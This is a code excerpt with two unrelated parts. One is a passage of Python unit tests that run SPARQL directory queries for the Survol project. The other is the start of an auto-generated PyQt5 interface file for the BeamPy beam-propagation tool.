expected_files = [] for root_dir, dir_lists, files_list in os.walk(test_root_dir): print("root=", root_dir, dir_depth(root_dir), dir_depth(test_root_dir)) if dir_depth(root_dir) != dir_depth(test_root_dir) + 2: continue print("root_dir=", root_dir, dir_depth(root_dir)) for one_file_name in files_list: sub_path_name = lib_util.standardized_file_path(os.path.join(root_dir, one_file_name)) expected_files.append(sub_path_name) expected_files = sorted(expected_files) actual_files = sorted([str(one_path_url[0]) for one_path_url in query_result]) print("actual_files =", actual_files) print("expected_files=", expected_files) for x in zip(actual_files, expected_files): print(x) print("") self.assertEqual(actual_files, expected_files) def test_sparql_grandchildren_directories(self): rdflib_graph = _create_graph() sparql_query = """ PREFIX survol: <%s> SELECT ?subdirectory_name WHERE { ?url_grandparent a survol:CIM_Directory . ?url_directory a survol:CIM_Directory . ?url_subdirectory a survol:CIM_Directory . ?url_grandparent survol:CIM_DirectoryContainsFile ?url_directory . ?url_directory survol:CIM_DirectoryContainsFile ?url_subdirectory . ?url_grandparent survol:Name "%s" . ?url_subdirectory survol:Name ?subdirectory_name . } """ % (survol_namespace, _temp_dir_path) query_result = list(rdflib_graph.query(sparql_query)) expected_dirs = set() for root_dir, dir_lists, files_list in os.walk(_temp_dir_path): if lib_util.standardized_file_path(os.path.dirname(root_dir)) == _temp_dir_path: for one_file_name in dir_lists: sub_path_name = lib_util.standardized_file_path(os.path.join(root_dir, one_file_name)) expected_dirs.add(sub_path_name) actual_dirs = set([str(one_path_url[0]) for one_path_url in query_result]) print("actual_dirs=", actual_dirs) print("expected_dirs=", expected_dirs) self.assertEqual(actual_dirs, expected_dirs) def test_sparql_subdirectory_2(self): """Tests that a second-level directory is detected. """ rdflib_graph = _create_graph() dir_path = os.path.join(_temp_dir_path, "survol_temp_dir%s_1" % _unique_string, "survol_temp_dir%s_2" % _unique_string) os.makedirs(dir_path) dir_path = lib_util.standardized_file_path(dir_path) sparql_query = """ PREFIX survol: <%s> SELECT ?subdirectory_name WHERE { ?url_directory_0 a survol:CIM_Directory . ?url_directory_1 a survol:CIM_Directory . ?url_directory_2 a survol:CIM_Directory . ?url_directory_0 survol:CIM_DirectoryContainsFile ?url_directory_1 . ?url_directory_1 survol:CIM_DirectoryContainsFile ?url_directory_2 . ?url_directory_0 survol:Name "%s" . ?url_directory_2 survol:Name ?subdirectory_name . } """ % (survol_namespace, _temp_dir_path) query_result = list(rdflib_graph.query(sparql_query)) print("dir_path=", dir_path) actual_files = set([str(one_path_url[0]) for one_path_url in query_result]) print("actual_files=", actual_files) self.assertTrue(dir_path in actual_files) def test_sparql_subdirectory_3(self): """Tests that a third-level directory is detected. """ rdflib_graph = _create_graph() dir_path = os.path.join( _temp_dir_path, "survol_temp_dir%s_1" % _unique_string, "survol_temp_dir%s_2" % _unique_string, "survol_temp_dir%s_3" % _unique_string) os.makedirs(dir_path) # Must be called if the directory exists, otherwise, on Windows, it can be correctly capitalized. dir_path = lib_util.standardized_file_path(dir_path) print("dir_path=", dir_path) sparql_query = """ PREFIX
<filename>beampy/interface.py<gh_stars>10-100 # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'interface.ui' # # Created by: PyQt5 UI code generator 5.15.1 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(1144, 1019) MainWindow.setMinimumSize(QtCore.QSize(800, 935)) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.gridLayout = QtWidgets.QGridLayout(self.centralwidget) self.gridLayout.setObjectName("gridLayout") self.frame_file_data = QtWidgets.QFrame(self.centralwidget) self.frame_file_data.setFrameShape(QtWidgets.QFrame.NoFrame) self.frame_file_data.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_file_data.setObjectName("frame_file_data") self.verticalLayout = QtWidgets.QVBoxLayout(self.frame_file_data) self.verticalLayout.setObjectName("verticalLayout") self.tabWidget_main = QtWidgets.QTabWidget(self.frame_file_data) self.tabWidget_main.setObjectName("tabWidget_main") self.tabWidget_guide = QtWidgets.QWidget() self.tabWidget_guide.setObjectName("tabWidget_guide") self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.tabWidget_guide) self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.verticalLayout_guide = QtWidgets.QVBoxLayout() self.verticalLayout_guide.setObjectName("verticalLayout_guide") self.label_window_parameters = QtWidgets.QLabel(self.tabWidget_guide) self.label_window_parameters.setMinimumSize(QtCore.QSize(0, 62)) self.label_window_parameters.setMaximumSize(QtCore.QSize(16777215, 30)) self.label_window_parameters.setObjectName("label_window_parameters") self.verticalLayout_guide.addWidget(self.label_window_parameters) self.frame_window = QtWidgets.QFrame(self.tabWidget_guide) self.frame_window.setMinimumSize(QtCore.QSize(200, 0)) self.frame_window.setMaximumSize(QtCore.QSize(350, 16777215)) self.frame_window.setFrameShape(QtWidgets.QFrame.Box) self.frame_window.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_window.setObjectName("frame_window") self.formLayout_10 = QtWidgets.QFormLayout(self.frame_window) self.formLayout_10.setObjectName("formLayout_10") self.label_length = QtWidgets.QLabel(self.frame_window) self.label_length.setAccessibleDescription("") self.label_length.setOpenExternalLinks(False) self.label_length.setObjectName("label_length") self.formLayout_10.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_length) self.doubleSpinBox_length_z = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_length_z.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_length_z.setDecimals(3) self.doubleSpinBox_length_z.setMinimum(0.001) self.doubleSpinBox_length_z.setMaximum(100000.0) self.doubleSpinBox_length_z.setProperty("value", 10000.0) self.doubleSpinBox_length_z.setObjectName("doubleSpinBox_length_z") self.formLayout_10.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_length_z) self.label_dist_z = QtWidgets.QLabel(self.frame_window) self.label_dist_z.setObjectName("label_dist_z") self.formLayout_10.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_dist_z) self.doubleSpinBox_dist_z = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_dist_z.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_dist_z.setDecimals(3) self.doubleSpinBox_dist_z.setMinimum(0.001) self.doubleSpinBox_dist_z.setMaximum(100000.0) self.doubleSpinBox_dist_z.setProperty("value", 1.0) self.doubleSpinBox_dist_z.setObjectName("doubleSpinBox_dist_z") self.formLayout_10.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_dist_z) self.label_nbr_z_disp = QtWidgets.QLabel(self.frame_window) self.label_nbr_z_disp.setObjectName("label_nbr_z_disp") self.formLayout_10.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_nbr_z_disp) self.spinBox_nbr_z_disp = QtWidgets.QSpinBox(self.frame_window) self.spinBox_nbr_z_disp.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_nbr_z_disp.setMinimum(1) self.spinBox_nbr_z_disp.setMaximum(10000) self.spinBox_nbr_z_disp.setProperty("value", 200) self.spinBox_nbr_z_disp.setDisplayIntegerBase(10) self.spinBox_nbr_z_disp.setObjectName("spinBox_nbr_z_disp") self.formLayout_10.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.spinBox_nbr_z_disp) self.label_length_x = QtWidgets.QLabel(self.frame_window) self.label_length_x.setObjectName("label_length_x") self.formLayout_10.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_length_x) self.doubleSpinBox_length_x = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_length_x.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_length_x.setDecimals(3) self.doubleSpinBox_length_x.setMinimum(0.001) self.doubleSpinBox_length_x.setMaximum(10000.0) self.doubleSpinBox_length_x.setProperty("value", 1000.0) self.doubleSpinBox_length_x.setObjectName("doubleSpinBox_length_x") self.formLayout_10.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_length_x) self.label_dist_x = QtWidgets.QLabel(self.frame_window) self.label_dist_x.setObjectName("label_dist_x") self.formLayout_10.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_dist_x) self.doubleSpinBox_dist_x = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_dist_x.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_dist_x.setDecimals(3) self.doubleSpinBox_dist_x.setMinimum(0.001) self.doubleSpinBox_dist_x.setMaximum(100.0) self.doubleSpinBox_dist_x.setProperty("value", 0.2) self.doubleSpinBox_dist_x.setObjectName("doubleSpinBox_dist_x") self.formLayout_10.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_dist_x) self.label_n = QtWidgets.QLabel(self.frame_window) self.label_n.setObjectName("label_n") self.formLayout_10.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_n) self.doubleSpinBox_n = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_n.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_n.setDecimals(6) self.doubleSpinBox_n.setMinimum(1.0) self.doubleSpinBox_n.setMaximum(1000.0) self.doubleSpinBox_n.setSingleStep(0.1) self.doubleSpinBox_n.setProperty("value", 2.14) self.doubleSpinBox_n.setObjectName("doubleSpinBox_n") self.formLayout_10.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_n) self.doubleSpinBox_lo = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_lo.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_lo.setDecimals(4) self.doubleSpinBox_lo.setMinimum(0.01) self.doubleSpinBox_lo.setMaximum(100.0) self.doubleSpinBox_lo.setProperty("value", 1.55) self.doubleSpinBox_lo.setObjectName("doubleSpinBox_lo") self.formLayout_10.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_lo) self.label_lo = QtWidgets.QLabel(self.frame_window) self.label_lo.setObjectName("label_lo") self.formLayout_10.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_lo) self.verticalLayout_guide.addWidget(self.frame_window) spacerItem = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum) self.verticalLayout_guide.addItem(spacerItem) self.label_guides_information = QtWidgets.QLabel(self.tabWidget_guide) self.label_guides_information.setMinimumSize(QtCore.QSize(190, 62)) self.label_guides_information.setMaximumSize(QtCore.QSize(16777215, 30)) self.label_guides_information.setObjectName("label_guides_information") self.verticalLayout_guide.addWidget(self.label_guides_information) self.frame_guides = QtWidgets.QFrame(self.tabWidget_guide) self.frame_guides.setMinimumSize(QtCore.QSize(270, 0)) self.frame_guides.setMaximumSize(QtCore.QSize(350, 16777215)) self.frame_guides.setFrameShape(QtWidgets.QFrame.Box) self.frame_guides.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_guides.setObjectName("frame_guides") self.formLayout_6 = QtWidgets.QFormLayout(self.frame_guides) self.formLayout_6.setObjectName("formLayout_6") self.comboBox_guide = QtWidgets.QComboBox(self.frame_guides) self.comboBox_guide.setMaximumSize(QtCore.QSize(100, 16777215)) self.comboBox_guide.setObjectName("comboBox_guide") self.formLayout_6.setWidget(0, QtWidgets.QFormLayout.SpanningRole, self.comboBox_guide) self.Qframe_guide_create = QtWidgets.QFrame(self.frame_guides) self.Qframe_guide_create.setFrameShape(QtWidgets.QFrame.StyledPanel) self.Qframe_guide_create.setFrameShadow(QtWidgets.QFrame.Raised) self.Qframe_guide_create.setObjectName("Qframe_guide_create") self.gridLayout_2 = QtWidgets.QGridLayout(self.Qframe_guide_create) self.gridLayout_2.setObjectName("gridLayout_2") self.pushButton_save_guide = QtWidgets.QPushButton(self.Qframe_guide_create) self.pushButton_save_guide.setObjectName("pushButton_save_guide") self.gridLayout_2.addWidget(self.pushButton_save_guide, 1, 0, 1, 1) self.pushButton_delete_guide = QtWidgets.QPushButton(self.Qframe_guide_create) self.pushButton_delete_guide.setObjectName("pushButton_delete_guide") self.gridLayout_2.addWidget(self.pushButton_delete_guide, 0, 1, 1, 1) self.pushButton_create_guide = QtWidgets.QPushButton(self.Qframe_guide_create) self.pushButton_create_guide.setObjectName("pushButton_create_guide") self.gridLayout_2.addWidget(self.pushButton_create_guide, 0, 0, 1, 1) self.pushButton_cancel_guide = QtWidgets.QPushButton(self.Qframe_guide_create) self.pushButton_cancel_guide.setStatusTip("") self.pushButton_cancel_guide.setObjectName("pushButton_cancel_guide") self.gridLayout_2.addWidget(self.pushButton_cancel_guide, 1, 1, 1, 1) self.formLayout_6.setWidget(1, QtWidgets.QFormLayout.SpanningRole, self.Qframe_guide_create) self.label_width = QtWidgets.QLabel(self.frame_guides) self.label_width.setMinimumSize(QtCore.QSize(40, 0)) self.label_width.setObjectName("label_width") self.formLayout_6.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_width) self.doubleSpinBox_width = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_width.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_width.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_width.setDecimals(3) self.doubleSpinBox_width.setMinimum(0.0) self.doubleSpinBox_width.setMaximum(10000.0) self.doubleSpinBox_width.setProperty("value", 8.0) self.doubleSpinBox_width.setObjectName("doubleSpinBox_width") self.formLayout_6.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_width) self.label_offset_guide = QtWidgets.QLabel(self.frame_guides) self.label_offset_guide.setMinimumSize(QtCore.QSize(40, 0)) self.label_offset_guide.setObjectName("label_offset_guide") self.formLayout_6.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_offset_guide) self.doubleSpinBox_offset_guide = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_offset_guide.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_offset_guide.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_offset_guide.setDecimals(3) self.doubleSpinBox_offset_guide.setMinimum(-5000.0) self.doubleSpinBox_offset_guide.setMaximum(5000.0) self.doubleSpinBox_offset_guide.setObjectName("doubleSpinBox_offset_guide") self.formLayout_6.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_offset_guide) self.label_dn = QtWidgets.QLabel(self.frame_guides) self.label_dn.setMinimumSize(QtCore.QSize(40, 0)) self.label_dn.setObjectName("label_dn") self.formLayout_6.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_dn) self.doubleSpinBox_dn = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_dn.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_dn.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_dn.setDecimals(6) self.doubleSpinBox_dn.setMaximum(1000.0) self.doubleSpinBox_dn.setProperty("value", 0.001) self.doubleSpinBox_dn.setObjectName("doubleSpinBox_dn") self.formLayout_6.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_dn) self.checkBox_n_imag = QtWidgets.QCheckBox(self.frame_guides) self.checkBox_n_imag.setMinimumSize(QtCore.QSize(60, 0)) self.checkBox_n_imag.setChecked(True) self.checkBox_n_imag.setObjectName("checkBox_n_imag") self.formLayout_6.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.checkBox_n_imag) self.doubleSpinBox_n_imag = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_n_imag.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_n_imag.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_n_imag.setDecimals(6) self.doubleSpinBox_n_imag.setMaximum(20.0) self.doubleSpinBox_n_imag.setObjectName("doubleSpinBox_n_imag") self.formLayout_6.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_n_imag) self.label_lost = QtWidgets.QLabel(self.frame_guides) self.label_lost.setMinimumSize(QtCore.QSize(60, 0)) self.label_lost.setObjectName("label_lost") self.formLayout_6.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_lost) self.doubleSpinBox_lost = QtWidgets.QDoubleSpinBox(self.frame_guides) self.doubleSpinBox_lost.setEnabled(False) self.doubleSpinBox_lost.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_lost.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_lost.setDecimals(5) self.doubleSpinBox_lost.setMaximum(10000.0) self.doubleSpinBox_lost.setProperty("value", 1.0) self.doubleSpinBox_lost.setObjectName("doubleSpinBox_lost") self.formLayout_6.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_lost) self.label = QtWidgets.QLabel(self.frame_guides) self.label.setMinimumSize(QtCore.QSize(130, 0)) self.label.setLineWidth(1) self.label.setObjectName("label") self.formLayout_6.setWidget(8, QtWidgets.QFormLayout.SpanningRole, self.label) self.radioButton_gaussian = QtWidgets.QRadioButton(self.frame_guides) self.radioButton_gaussian.setMinimumSize(QtCore.QSize(70, 0)) self.radioButton_gaussian.setChecked(True) self.radioButton_gaussian.setObjectName("radioButton_gaussian") self.formLayout_6.setWidget(9, QtWidgets.QFormLayout.LabelRole, self.radioButton_gaussian) self.spinBox_gauss_pow = QtWidgets.QSpinBox(self.frame_guides) self.spinBox_gauss_pow.setMinimumSize(QtCore.QSize(70, 0)) self.spinBox_gauss_pow.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_gauss_pow.setSuffix("") self.spinBox_gauss_pow.setMinimum(1) self.spinBox_gauss_pow.setMaximum(10) self.spinBox_gauss_pow.setSingleStep(1) self.spinBox_gauss_pow.setProperty("value", 4) self.spinBox_gauss_pow.setObjectName("spinBox_gauss_pow") self.formLayout_6.setWidget(9, QtWidgets.QFormLayout.FieldRole, self.spinBox_gauss_pow) self.radioButton_squared = QtWidgets.QRadioButton(self.frame_guides) self.radioButton_squared.setMinimumSize(QtCore.QSize(70, 0)) self.radioButton_squared.setObjectName("radioButton_squared") self.formLayout_6.setWidget(10, QtWidgets.QFormLayout.LabelRole, self.radioButton_squared) self.tabWidget_morphology_guide = QtWidgets.QTabWidget(self.frame_guides) self.tabWidget_morphology_guide.setMinimumSize(QtCore.QSize(250, 0)) self.tabWidget_morphology_guide.setToolTip("") self.tabWidget_morphology_guide.setObjectName("tabWidget_morphology_guide") self.tab_array = QtWidgets.QWidget() self.tab_array.setObjectName("tab_array") self.formLayout = QtWidgets.QFormLayout(self.tab_array) self.formLayout.setObjectName("formLayout") self.label_nb_p = QtWidgets.QLabel(self.tab_array) self.label_nb_p.setMinimumSize(QtCore.QSize(90, 0)) self.label_nb_p.setObjectName("label_nb_p") self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_nb_p) self.spinBox_nb_p = QtWidgets.QSpinBox(self.tab_array) self.spinBox_nb_p.setMinimumSize(QtCore.QSize(40, 0)) self.spinBox_nb_p.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_nb_p.setMaximum(1000) self.spinBox_nb_p.setProperty("value", 11) self.spinBox_nb_p.setObjectName("spinBox_nb_p") self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.spinBox_nb_p) self.label_p = QtWidgets.QLabel(self.tab_array) self.label_p.setMinimumSize(QtCore.QSize(120, 0)) self.label_p.setObjectName("label_p") self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_p) self.doubleSpinBox_p = QtWidgets.QDoubleSpinBox(self.tab_array) self.doubleSpinBox_p.setMinimumSize(QtCore.QSize(80, 0)) self.doubleSpinBox_p.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_p.setDecimals(3) self.doubleSpinBox_p.setMaximum(10000.0) self.doubleSpinBox_p.setProperty("value", 15.0) self.doubleSpinBox_p.setObjectName("doubleSpinBox_p") self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_p) self.doubleSpinBox_offset_guide_z = QtWidgets.QDoubleSpinBox(self.tab_array) self.doubleSpinBox_offset_guide_z.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_offset_guide_z.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_offset_guide_z.setDecimals(3) self.doubleSpinBox_offset_guide_z.setMaximum(100000.0) self.doubleSpinBox_offset_guide_z.setObjectName("doubleSpinBox_offset_guide_z") self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_offset_guide_z) self.label_offset_guide_z = QtWidgets.QLabel(self.tab_array) self.label_offset_guide_z.setMinimumSize(QtCore.QSize(40, 0)) self.label_offset_guide_z.setObjectName("label_offset_guide_z") self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_offset_guide_z) self.doubleSpinBox_guide_length = QtWidgets.QDoubleSpinBox(self.tab_array) self.doubleSpinBox_guide_length.setMinimumSize(QtCore.QSize(100, 0)) self.doubleSpinBox_guide_length.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_guide_length.setDecimals(3) self.doubleSpinBox_guide_length.setMaximum(100000.0) self.doubleSpinBox_guide_length.setProperty("value", 100000.0) self.doubleSpinBox_guide_length.setObjectName("doubleSpinBox_guide_length") self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_guide_length) self.label_guide_length = QtWidgets.QLabel(self.tab_array) self.label_guide_length.setMinimumSize(QtCore.QSize(40, 0)) self.label_guide_length.setObjectName("label_guide_length") self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_guide_length) self.tabWidget_morphology_guide.addTab(self.tab_array, "") self.tab_curved = QtWidgets.QWidget() self.tab_curved.setObjectName("tab_curved") self.formLayout_2 = QtWidgets.QFormLayout(self.tab_curved) self.formLayout_2.setObjectName("formLayout_2") self.label_curve = QtWidgets.QLabel(self.tab_curved) self.label_curve.setMinimumSize(QtCore.QSize(60, 0)) self.label_curve.setObjectName("label_curve") self.formLayout_2.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_curve) self.doubleSpinBox_curve = QtWidgets.QDoubleSpinBox(self.tab_curved) self.doubleSpinBox_curve.setMinimumSize(QtCore.QSize(140, 0)) self.doubleSpinBox_curve.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_curve.setDecimals(3) self.doubleSpinBox_curve.setMinimum(-100000000.0) self.doubleSpinBox_curve.setMaximum(100000000.0) self.doubleSpinBox_curve.setProperty("value", 40.0) self.doubleSpinBox_curve.setObjectName("doubleSpinBox_curve") self.formLayout_2.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_curve) self.label_half_delay = QtWidgets.QLabel(self.tab_curved) self.label_half_delay.setMinimumSize(QtCore.QSize(60, 0)) self.label_half_delay.setObjectName("label_half_delay") self.formLayout_2.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_half_delay) self.doubleSpinBox_half_delay = QtWidgets.QDoubleSpinBox(self.tab_curved) self.doubleSpinBox_half_delay.setMinimumSize(QtCore.QSize(90, 0)) self.doubleSpinBox_half_delay.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_half_delay.setDecimals(3) self.doubleSpinBox_half_delay.setMaximum(100000.0) self.doubleSpinBox_half_delay.setProperty("value", 1000.0) self.doubleSpinBox_half_delay.setObjectName("doubleSpinBox_half_delay") self.formLayout_2.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_half_delay) self.label_distance_factor = QtWidgets.QLabel(self.tab_curved) self.label_distance_factor.setMinimumSize(QtCore.QSize(60, 0)) self.label_distance_factor.setObjectName("label_distance_factor") self.formLayout_2.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_distance_factor) self.doubleSpinBox_distance_factor = QtWidgets.QDoubleSpinBox(self.tab_curved) self.doubleSpinBox_distance_factor.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_distance_factor.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_distance_factor.setDecimals(3) self.doubleSpinBox_distance_factor.setMaximum(10000.0) self.doubleSpinBox_distance_factor.setProperty("value", 1.2) self.doubleSpinBox_distance_factor.setObjectName("doubleSpinBox_distance_factor") self.formLayout_2.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_distance_factor) self.tabWidget_morphology_guide.addTab(self.tab_curved, "") self.formLayout_6.setWidget(12, QtWidgets.QFormLayout.SpanningRole, self.tabWidget_morphology_guide) self.verticalLayout_guide.addWidget(self.frame_guides) self.calculateButton_guide = QtWidgets.QPushButton(self.tabWidget_guide) self.calculateButton_guide.setMaximumSize(QtCore.QSize(350, 16777215)) self.calculateButton_guide.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor)) self.calculateButton_guide.setObjectName("calculateButton_guide") self.verticalLayout_guide.addWidget(self.calculateButton_guide) spacerItem1 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum) self.verticalLayout_guide.addItem(spacerItem1) spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout_guide.addItem(spacerItem2) self.horizontalLayout_2.addLayout(self.verticalLayout_guide) self.plot_guide = QtWidgets.QVBoxLayout() self.plot_guide.setObjectName("plot_guide") self.horizontalLayout_2.addLayout(self.plot_guide) self.tabWidget_main.addTab(self.tabWidget_guide, "") self.tabWidget_light = QtWidgets.QWidget() self.tabWidget_light.setObjectName("tabWidget_light") self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.tabWidget_light) self.horizontalLayout_4.setObjectName("horizontalLayout_4") self.verticalLayout_light = QtWidgets.QVBoxLayout() self.verticalLayout_light.setObjectName("verticalLayout_light") self.label_light_informations = QtWidgets.QLabel(self.tabWidget_light) self.label_light_informations.setMinimumSize(QtCore.QSize(0, 62)) self.label_light_informations.setMaximumSize(QtCore.QSize(16777215, 30)) self.label_light_informations.setObjectName("label_light_informations") self.verticalLayout_light.addWidget(self.label_light_informations) self.frame_light = QtWidgets.QFrame(self.tabWidget_light) self.frame_light.setMinimumSize(QtCore.QSize(120, 0)) self.frame_light.setMaximumSize(QtCore.QSize(120, 16777215)) self.frame_light.setFrameShape(QtWidgets.QFrame.Box) self.frame_light.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_light.setObjectName("frame_light") self.formLayout_lo_theta = QtWidgets.QFormLayout(self.frame_light) self.formLayout_lo_theta.setObjectName("formLayout_lo_theta") self.label_theta_ext = QtWidgets.QLabel(self.frame_light) self.label_theta_ext.setObjectName("label_theta_ext") self.formLayout_lo_theta.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_theta_ext) self.doubleSpinBox_theta_ext = QtWidgets.QDoubleSpinBox(self.frame_light) self.doubleSpinBox_theta_ext.setMinimumSize(QtCore.QSize(60, 0)) self.doubleSpinBox_theta_ext.setMaximumSize(QtCore.QSize(60, 16777215)) self.doubleSpinBox_theta_ext.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_theta_ext.setMinimum(-28.0) self.doubleSpinBox_theta_ext.setMaximum(28.0) self.doubleSpinBox_theta_ext.setObjectName("doubleSpinBox_theta_ext") self.formLayout_lo_theta.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_theta_ext) self.verticalLayout_light.addWidget(self.frame_light) spacerItem3 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum) self.verticalLayout_light.addItem(spacerItem3) self.frame_beam = QtWidgets.QFrame(self.tabWidget_light) self.frame_beam.setMinimumSize(QtCore.QSize(250, 0)) self.frame_beam.setMaximumSize(QtCore.QSize(350, 16777215)) self.frame_beam.setFrameShape(QtWidgets.QFrame.Box) self.frame_beam.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_beam.setObjectName("frame_beam") self.gridLayout_5 = QtWidgets.QGridLayout(self.frame_beam) self.gridLayout_5.setObjectName("gridLayout_5") self.label_offset_light = QtWidgets.QLabel(self.frame_beam) self.label_offset_light.setEnabled(True) self.label_offset_light.setMaximumSize(QtCore.QSize(60, 16777215)) self.label_offset_light.setObjectName("label_offset_light") self.gridLayout_5.addWidget(self.label_offset_light, 4, 0, 1, 1) self.label_intensity = QtWidgets.QLabel(self.frame_beam) self.label_intensity.setMaximumSize(QtCore.QSize(60, 16777215)) self.label_intensity.setObjectName("label_intensity") self.gridLayout_5.addWidget(self.label_intensity, 5, 0, 1, 1) self.radioButton_mode = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_mode.setMaximumSize(QtCore.QSize(70, 16777215)) self.radioButton_mode.setObjectName("radioButton_mode") self.gridLayout_5.addWidget(self.radioButton_mode, 11, 0, 1, 1) 